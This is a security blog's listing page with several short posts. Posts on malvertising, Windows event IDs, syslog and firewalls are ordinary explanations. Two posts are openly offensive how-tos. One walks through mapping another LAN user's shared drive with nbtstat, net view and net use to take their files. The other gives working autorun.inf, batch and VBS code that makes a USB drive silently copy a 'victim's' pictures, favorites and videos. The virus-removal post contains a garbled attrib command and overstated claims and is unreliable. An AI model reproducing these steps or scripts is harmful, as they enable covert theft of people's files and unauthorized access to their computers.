Malvertising

Malvertising

  January 25, 2019    Davinder

---

Malvertising, or malicious advertising, is the use of online, malicious advertisements to spread malware and compromise systems. Generally this occurs through the injection of unwanted or malicious code into ads. Malicious actors then pay legitimate online advertising networks to display the infected ads on various websites, exposing every user visiting these sites to the potential risk of infection. Generally, the legitimate advertising networks and websites are not aware they are serving malicious content.

How does malvertising work?

Malicious actors hide a small piece of code deep within a legitimate looking advertisement, which will direct the user’s machine to a malicious or compromised server. When the user’s machine successfully makes a connection to the server, an exploit kit hosted on that server executes. An exploit kit is a type of malware that evaluates a system, determines what vulnerabilities exist on the system, and exploits a vulnerability. From there, the malicious actor is able to install malware by utilizing the security bypass created by the exploit kit. The additional software could allow the attacker to perform a number of actions including, allowing full access to the computer, exfiltrating financial or sensitive information, locking the system and holding it ransom via ransomware, or adding the system to a botnet so it can be used to perform additional attacks. This entire process occurs behind the scenes, out of sight of the user and without any interaction from the user.

The Most Popular Exploit Kit

One of the most popular exploit kits currently in use is the Angler Exploit Kit. Angler employs a number of evasion techniques in order to avoid being detected. For example, the URL of the landing page the user’s computer connects to, where the exploit kit is hosted, is often generated dynamically. This makes it difficult to detect because the URL is constantly changing. Angler also has the functionality to determine if it is being run inside of a virtual machine, thus making it difficult for cybersecurity analysts to perform analysis on it. Finally, multiple layers of obfuscation exist in Angler, built on top of each other with various encoding schemes (base64, RC4, etc.) to hide the code that executes when the vulnerable user visits the server.

Angler uses a variety of vulnerabilities in Adobe Flash, Microsoft Silverlight, and Oracle Java. These are all extremely common extensions running on many popular web browsers. When the user’s computer visits the server hosting the exploit kit, the system is scanned to determine which versions of the above software are running on the user’s browser. From there, Angler picks the best vulnerability for exploiting the victim.

Read More

Types of Windows Events

Types of Windows Events

  November 30, 2018    Davinder

---

We have 5 types of security events in windows >

Error : When some kind of service failed to execute or there is some loss of information

Warning : This event is generated when there is some problem going to happen in future .  Like  disk space utilization message .

Information : This type of event is generated when there is some informative message , like application services are running accurately

Success audit : This type of  event generated when user successfully logged in to a system

Failure audit : When there is failure in login attempt .

Main security Events

	ID	Level	Event Log	Event Source
App Error	1000	Error	Application	Application Error
App Hang	1002	Error	Application	Application Hang
BSOD	1001	Error	System	Microsoft-Windows-WER- SystemErrorReporting
WER	1001	Informational	Application	Windows Error Reporting
EMET	12	WarningError	ApplicationApplication	EMET

Hackers need access to your systems just like any other user, so it’s worth looking for suspicious login activity. Table 2 shows events that might show a problem. Pass-the-Hash (PtH) is a popular form of attack that allows a hacker to gain access to an account without needing to know the password. Look out for NTLM Logon Type 3 event IDs 4624 (failure) and 4625 (success).

Table 2 – Account Usage

	ID	Level	Event Log	Event Source
Account Lockouts	4740	Informational	Security	Microsoft-Windows-Security- Auditing
User Added to Privileged Group	4728, 4732, 4756	Informational	Security	Microsoft-Windows-Security- Auditing
Security-Enabled group Modification	4735	Informational	Security	Microsoft-Windows-Security- Auditing
Successful User Account Login	4624	Informational	Security	Microsoft-Windows-Security- Auditing
Failed User Account Login	4625	Informational	Security	Microsoft-Windows-Security- Auditing
Account Login with Explicit Credentials	4648	Informational	Security	Microsoft-Windows-Security- Auditing

High-value assets, like domain controllers, shouldn’t be managed using Remote Desktop. Logon Type 10 event IDs 4624 (Logon) and 4634 (Logoff) might point towards malicious RDP activity.

Read More

What is Syslog?

What is Syslog?

  November 29, 2018    Davinder

---

Syslog stands for System Logging Protocol and is a standard protocol used to send system log or event messages to a specific server, called a syslog server. It is primarily used to collect various device logs from several different machines in a central location for monitoring and review.

Syslog

The protocol is enabled on most network equipment such as routers, switches, firewalls, and even some printers and scanners. In addition, syslog is available on Unix and Linux based systems and many web servers including Apache. Syslog is not installed by default on Windows systems, which use their own Windows Event Log. These events can be forwarded via third-party utilities or other configurations using the syslog protocol.

Syslog is defined in RFC 5424, The Syslog Protocol, which obsoleted the previous RFC 3164.

Syslog Components

On any given device various events are generated by the system in response to changing conditions. These events are typically logged locally where they can be reviewed and analyzed by an administrator. However, monitoring numerous logs over an equally numerous number of routers, switches, and systems would be time consuming and impractical. Syslog helps solve this issue by forwarding those events to a centralized server.

Syslog Transmission

Traditionally, Syslog uses the UDP protocol on port 514 but can be configured to use any port. In addition, some devices will use TCP 1468 to send syslog data to get confirmed message delivery.

Syslog packet transmission is asynchronous. What causes a syslog message to be generated is configured within the router, switch, or server itself. Unlike other monitoring protocols, such as SNMP, there is no mechanism to poll the syslog data. In some implementations, SNMP may be used to set or modify syslog parameters remotely.

he syslog message consists of three parts: PRI (a calculated priority value), HEADER (with identifying information), and MSG (the message itself).

The PRI data sent via the syslog protocol comes from two numeric values that help categorize the message. The first is the Facility value. This value is one of 15 predefined values or various locally defined values in the case of 16 to 23. These values categorize the type of message or which system generated the event.

Number	Facility description
0	Kernel messages
1	User-level messages
2	Mail System
3	System Daemons
4	Security/Authorization Messages
5	Messages generated by syslogd
6	Line Printer Subsystem
7	Network News Subsystem
8	UUCP Subsystem
9	Clock Daemon
10	Security/Authorization Messages
11	FTP Daemon
12	NTP Subsystem
13	Log Audit
14	Log Alert
15	Clock Daemon
16 - 23	Local Use 0 - 7

The second label of a syslog message categorizes the importance or severity of the message in a numerical code from 0 to 7.

Code	Severity	Description
0	Emergency	System is unusable
1	Alert	Action must be taken immediately
2	Critical	Critical conditions
3	Error	Error conditions
4	Warning	Warning conditions
5	Notice	Normal but significant condition
6	Informational	Informational messages
7	Debug	Debug-level messages

The values of both labels do not have hard definitions. Thus, it is up to the system or application to determine how to log an event (for example, as a warning, notice, or something else) and on which facility. Within the same application or service, lower numbers should correspond to more severe issues relative to the specific process.

The two values are combined to produce a Priority Value sent with the message. The Priority Value is calculated by multiplying the Facility value by eight and then adding the Severity Value to the result. The lower the PRI, the higher the priority.

(Facility Value * 8) + Severity Value = PRI

In this way, a kernel message receives lower value (higher priority) than a log alert, regardless of the severity of the log alert. Additional identifiers in the packet include the hostname, IP address, process ID, app name, and timestamp of the message.
The actual verbiage or content of the syslog message is not defined by the protocol. Some messages are simple, readable text, others may only be machine readable.

Syslog messages are typically no longer than 1024 bytes.

Example of a Syslog Message

<165>1 2003-10-11T22:14:15.003Z mymachine.example.com - ID47 [exampleSDID@32473 iut="3" eventSource=" eventID="1011"] BOMAn application log entry...

Parts of the Syslog Message:

Part	Value	Information
PRI	165	Facility = 20, Severity = 5
VERSION	1	Version 1
TIMESTAMP	2017-05-11T21:14:15.003Z	Message created on 11 May 2017 at 09:14:15 pm, 3 milliseconds into the next second
HOSTNAME	mymachine.example.com	Message originated from host "mymachine.example.com"
APP-NAME	su	App-Name: "su"
PROCID	-	PROCID unknown
MSGID	ID47	Message-ID: 47
STRUCTURED-DATA	[exampleSDID@32473 iut="3" eventSource=" eventID="1011"]	Structured Data Element with a non-IANA controlled SD-ID of type "exampleSDID@32473", which has three parameters
MSG	BOMAn application log entry...	BOM indicates UTF-8 encoding, the message itself is "An application log entry..."

The Syslog Server

The Syslog Server

The Syslog Server is also known as the syslog collector or receiver.

Syslog messages are sent from the generating device to the collector. The IP address of the destination syslog server must be configured on the device itself, either by command-line or via a conf file. Once configured, all syslog data will be sent to that server. There is no mechanism within the syslog protocol for a different server to request syslog data.

While most Unix implementations and network vendors, like Cisco, have their own barebones syslog collectors, there are several others available as well.

Paessler’s PRTG monitoring software offers a built-in Syslog Receiver Sensor. The receiver collects all Syslog messages delivered. To use the function, the administrator needs to add the Syslog Receiver and then configure the IP address of that server as the destination server for syslog data on all devices to be monitored.

Once gathered, the dashboard shows:

• The number of received syslog messages per second.


• The number of messages categorized as “warning” per second.


• The number of messages categorized as “error” per second.


• The number of dropped packets per second.

The syslog protocol can generate a lot of messages. Syslog simply forwards messages as quickly as it generates them. As a result, the most important ability for a syslog server is the ability to properly filter and react to incoming syslog data.

The PRTG Syslog Receiver Sensor offers the ability to set filtering rules. These rules allow syslog messages to be included or excluded as warnings or errors, regardless of how they were originally generated on the device. This filtering ensures that administrators get notified about all the errors they want to know about without being overwhelmed by less important errors.

Security

The syslog protocol offers no security mechanism. There is no authentication built-in to ensure that messages are coming from the device claiming to be sending them. There is no encryption to conceal what information is being sent to the server. It is particularly susceptible to so-called “playback attacks” where an attacker generates a previous stream of warnings to illicit a response.

Syslog Design

Device Configuration

Most syslog implementations are configurable with respect to which facilities and which severity numbers will generate syslog events that are forwarded to the syslog server. It is important to configure this properly to avoid flooding the server (and the network) with unnecessary traffic. For example, Debug should never be set to send messages except during testing.

It is advisable to set the syslog parameters to require the highest possible (lowest numbered) facility and severity to minimize traffic. While a router error might indicate that an interface is down and thus definitely needs to be reported, a less important network printer might be configured to only generate syslog traffic for critical events.

Windows

Windows systems do not implement syslog within the standard Event Log system. The events generated within the Windows logging system can be gathered and forwarded to a syslog server using third-party utilities. These utilities monitor the Event Log, use the information to create a syslog formatted event, and forward the events using the standard syslog protocol.

Limitations

One major limitation of the syslog protocol is that the device being monitoring must be up and running and connected to the network to generate and send a syslog event. A critical error from the kernel facility may never send an error at all as the system goes offline. In other words, syslog is not a good way to monitor the up and down status of devices.

Syslog Usage

While syslog is not a good way to monitor the status of networked devices, it can be a good way to monitor the overall health of network equipment. While network monitoring software like PRTG offers a suite of utilities to watch over a network, nothing tells an administrator that there is a problem faster than an event log filling up with warnings. Properly configured syslog monitoring will detect the sudden increase in event volume and severity, possibly providing notice before a user-detectable problem occurs.

Security/Authorization/Auditing

The average corporate network contains numerous devices that no one should be trying to gain access to on an average day. If a remote switch that only gets logged into once per audit cycle suddenly has daily login attempts (successful or otherwise), it bears checking out. On these types of devices, syslog can be set to forward authentication events to a syslog server, without the overhead of having to install and configure a full monitoring agent.

Syslog also provides a way to ensure that critical events are logged and stored off the original server. An attacker’s first effort after compromising a system is to cover the tracks left in the log. Events forwarded via syslog will be out of reach.

Application Monitoring

There are plenty of ways to monitor how an application is running on a server. However, those monitors can overlook how the application is affecting other processes on the server. While high CPU or memory utilization is easy enough to detect with other monitors, logged events can help show more possible issues. Is an application continuously trying to access a file that is locked? Is there an attempted database write generating an error? Events like these may go undetected when caused by applications that do a good job of working around errors, but they shouldn’t be ignored. Syslog will make sure those logged events get the attention they deserve.

Syslog as Part of Overall Network Monitoring

Complete network monitoring requires using multiple tools. Syslog is an important pillar in network monitoring because it ensures that events occurring without a dramatic effect do not fall through the cracks. Best practice is to use a software that combines all the tools to always have an overview of what is happening in the network.

Read More

What is Firewall - Its importance and types

What is Firewall - Its importance and types

  November 14, 2018    Davinder

---

A firewall is a system designed to prevent unauthorized access to or from a private network. You can implement a firewall in either hardware or software form, or a combination of both. Firewalls prevent unauthorized internet users from accessing private networks connected to the internet, especially intranets. All messages entering or leaving the intranet (i.e., the local network to which you are connected) must pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.

Note: In protecting private information, a firewall is considered a first line of defense; it cannot, however, be considered the only such line. Firewalls are generally designed to protect network traffic and connections, and therefore do not attempt to authenticate individual users when determining who can access a particular computer or network.

Several types of firewalls exist:

• Packet filtering: The system examines each packet entering or leaving the network and accepts or rejects it based on user-defined rules. Packet filtering is fairly effective and transparent to users, but it is difficult to configure. In addition, it is susceptible to IP spoofing.


• Circuit-level gateway implementation: This process applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking.


• Acting as a proxy server: A proxy server is a type of gateway that hides the true network address of the computer(s) connecting through it. A proxy server connects to the internet, makes the requests for pages, connections to servers, etc., and receives the data on behalf of the computer(s) behind it. The firewall capabilities lie in the fact that a proxy can be configured to allow only certain types of traffic to pass (e.g., HTTP files, or web pages). A proxy server has the potential drawback of slowing network performance, since it has to actively analyze and manipulate traffic passing through it.


• Web application firewall: A web application firewall is a hardware appliance, server plug-in, or some other software filter that applies a set of rules to a HTTP conversation. Such rules are generally customized to the application so that many attacks can be identified and blocked.

In practice, many firewalls use two or more of these techniques in concert.

In Windows and Mac OS X, firewalls are built into the operating system.

To make use of Firewall , we implement policies>

There are mainly two zones

Trust & Un-Trust

By default > traffic from trust to un-trust is allowed

Untrust to trust all traffic are denied , until we implement the policies .

 

Read More

Hack Into A Computer Which Is Connect On same network(LAN)

Hack Into A Computer Which Is Connect On same network(LAN)

  April 25, 2018    Davinder

---

Step 1:- Finding the target

So first off we need to find a computer or the computer to hack into. So if your
plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and
Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local sub net. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross.

Another window will pop up, make sure “All host in my subnet” is selected, and then

click ok.

It should begin to scan.

Then IP’s, computer names, and mac addresses will show up

Now remember the IP address of the computer you are going to be breaking into.

If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.

Step 2:- Trial and error

Now, we don’t know if we have our designated target, or if we have a computer or
printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this
section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the
command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you
type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping
192.168.1.103.”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private
information):

IF it didn’t work, meaning that the target is not online, it will look something like this:

If the target is not online, either switch to a different target, or try another time.
If the target is online, then we can proceed.

---

Step 4:– Gathering the information

Now, input this command “nbtstat –a (IP address of target).” An example would be
“nbtstat –a 192.168.1.103.”
This will show us if there is file sharing enabled, and if there is, it will give us the:
currently logged on user, workgroup, and computer name.

Step 5:- Getting In

Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s
computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view 
(IP Address of Target)”
An example for this tutorial would be: “net view 192.168.1.103”

We have our just found our share name. In this case, under the share name is “C,”

meaning that the only shared thing on the computer is C. Then to the right, under
Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C
DISK can sometimes be an entire person’s hard drive.

As you can see, for my hack I have already used “K,” so I used “G” instead.

You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network
drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this
drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to
access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files
and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.

---

Congratulations! You’re DONE!

-Commands used in this tutorial:
PING
NBTSTAT -a (IP Address of Target)
NET VIEW (IP Address of Target)
NET USE K: (IP Address of Target)(SHARENAME)
-Program used in this tutorial:
Cain and Abel.

Read More

How To Remove Computer Viruses Using CMD

How To Remove Computer Viruses Using CMD

  April 25, 2018    Davinder

---

Today Virus can penetrate in our computer through numerous ways like through Internet Browsing, From USB devices and also by installing some infected software.

These viruses make our computer operate slow and also some of the dangerous viruses can steal our data. These viruses can also contaminate our operating system too. So the better choice is to remove these viruses as soon as possible.

There is the unconventional method to remove a virus from a computer system which includes antivirus programs and firewalls etc. But today we are discussing here a method by which you can easily Remove Computer Viruses Using Cmd. The method is simple and straight. Just read out the below post to proceed.

How To Remove Computer Viruses Using CMD

Actually, the command prompt is a utility program that has an access to reconstruct all the system files, and in this method, we will be using the same access of cmd. This method works on attributes removing which can be one reason of virus. As the most probable reason for the virus to come into your computer is through USB device. So this method works perfectly on USB to remove its viruses and secure your computer.

Steps To Remove Computer Viruses Using Command Prompt:

Firs of all click on Start and type cmd. Now right click on a the cmd icon and select run as administrator. Now command prompt window will open, now select your drive which you want to remove a virus.

Let the drive be D. So now type “dir D: attrib -s -h /s /d *.*” Now type  then press enter.

Now the command prompt will explore your selected drive and will load all the files on your drive.

Now if you notice and unusual file.exe and any of autorun.inf then rename it with the command(rename filename.extension new filename)

That’s it now you can access your drives without affecting from viruses.

So above is the-the method for How To Remove Computer Viruses Using CMD Command Prompt. By this method, you can easily remove even malicious viruses that can corrupt your operating system too. This method is very cool and efficient and doesn’t require any software just only a simple utility program of your system and simple cmd tricks. 

Read More

How to copy (steal) files from a computer to a Pendrive

How to copy (steal) files from a computer to a Pendrive

  April 25, 2018    Davinder

---

Have you ever want anything something from your friend PC,that he is not giving you like games,movies,important files etc. Here I come with cool tricks just plug your USB Flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a smart USB Flash drive.

STEP 1
Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.

 

STEP 2
Open Notepad again and copy-paste the following lines

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls
Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.

STEP 3
Open Notepad once again and copy-paste the following line.

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

STEP 4
Open Notepad one last time and copy-paste the following line.

wscript.exe \invisible.vbs file.bat
Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5
Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

Read More